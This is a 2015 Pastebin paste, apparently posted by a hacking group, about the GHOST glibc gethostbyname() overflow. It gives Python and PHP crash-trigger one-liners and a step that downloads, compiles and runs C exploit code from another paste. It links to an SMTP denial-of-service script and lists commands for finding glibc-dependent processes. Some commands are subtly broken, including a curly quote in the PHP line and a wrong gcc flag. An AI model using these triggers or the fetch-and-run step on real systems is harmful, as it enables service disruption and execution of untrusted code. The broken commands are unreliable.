API tools faq
paste
Advertisement
_d3f4ult

[+] Ghost: CVE-2015-0235 [+]

_d3f4ult
Jan 30th, 2015
3,352
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.00 KB | None | 0 0
raw download clone embed print report
  1. We are...
  2. _____ _________
  3. / _ \ ____ ____ ____ / _____/ ____ ____
  4. / /_\ \ / \ / _ \ / \ \_____ \_/ __ \_/ ___\
  5. / | \ | ( <_> ) | \/ \ ___/\ \___
  6. \____|__ /___| /\____/|___| /_______ /\___ >\___ >
  7. \/ \/ \/ \/ \/ \/
  8. //Laughing at your security since 2012*
  9. =================================================================================================
  10. Official Members: Mrlele - AnonSec666 - 3r3b0s - d3f4ult - PhantomGhost - Hannaichi - ap3x h4x0r
  11. - Gh05tFr3ak - spider64 - OverKiller - Cyb3r Shzz0r - Pr3d4T0r - Mr. BlackList
  12. - Razar - MR.WWW - AN0NT0XIC
  13. =================================================================================================
  14.  
  15. [+] Check if vuln to Ghost: glibc gethostbyname() buffer overflow via Python, PHP, C and Shell [+]
  16.  
  17. [+] Python [+]
  18. `python -c "print '0' * $((0x10000 - 16 * 1 - 2 * 4 - 1 - 4))" `
  19. Segmentation fault
  20. echo $?
  21.  
  22. [+] PHP [+]
  23. php -r '$e="0″;for($i=0;$i<2500;$i++){$e="0$e";} gethostbyname($e);' Segmentation fault
  24.  
  25. [+] C [+]
  26. wget http://pastebin.com/raw.php?i=7LFRPczm -O ghost.c
  27. gcc ghost.c -O ghost
  28. ./ghost
  29.  
  30.  
  31.  
  32. [+] ghost-smtp-dos.py [+]
  33. http://pastebin.com/QmngpTdy
  34.  
  35. [+] GhostFlow.c - Ghost BufferOverflow [+]
  36. http://pastebin.com/7LFRPczm
  37.  
  38. [+] Ghost.sh [+]
  39. http://pastebin.com/y9xGNrBi
  40.  
  41.  
  42.  
  43. [+] Check your libc version [+]
  44.  
  45. ldd --version
  46.  
  47. Here is a list of potential targets that we investigated (they all call
  48. gethostbyname, one way or another), but to the best of our knowledge,
  49. the buffer overflow cannot be triggered in any of them:
  50.  
  51. apache, cups, dovecot, gnupg, isc-dhcp, lighttpd, mariadb/mysql,
  52. nfs-utils, nginx, nodejs, openldap, openssh, postfix, proftpd,
  53. pure-ftpd, rsyslog, samba, sendmail, sysklogd, syslog-ng, tcp_wrappers,
  54. vsftpd, xinetd.
  55.  
  56.  
  57.  
  58. [+] Find Processes Dependant on glibc [+]
  59.  
  60. lsof | grep libc | awk '{print $1}' | sort | uniq
  61.  
  62. lsof | awk '/libc/{print $1 | "sort -u" }' you're welcome
  63.  
  64. netstat -lnp | grep -e "\(tcp.*LISTEN\|udp\)" | cut -d / -f 2- | sort -u
  65.  
  66. sudo netstat -lnp | awk -F/ '/LISTEN /{print $2}'
  67.  
  68.  
  69.  
  70.  
  71.  
  72. [+] Code Analysis [+]
  73.  
  74. gethostbyname() and friends fill in struct hostent:
  75.  
  76. struct hostent {
  77. char *h_name; /* official name of host */
  78. char **h_aliases; /* alias list */
  79. int h_addrtype; /* host address type */
  80. int h_length; /* length of address */
  81. char **h_addr_list; /* list of addresses */
  82. }
  83.  
  84.  
  85.  
  86. 101 *buffer_size = size_needed;
  87. 102 new_buf = (char *) realloc (*buffer, *buffer_size);
  88. 103
  89. 104 if (new_buf == NULL)
  90. 105 {
  91. ...
  92. 114 goto done;
  93. 115 }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!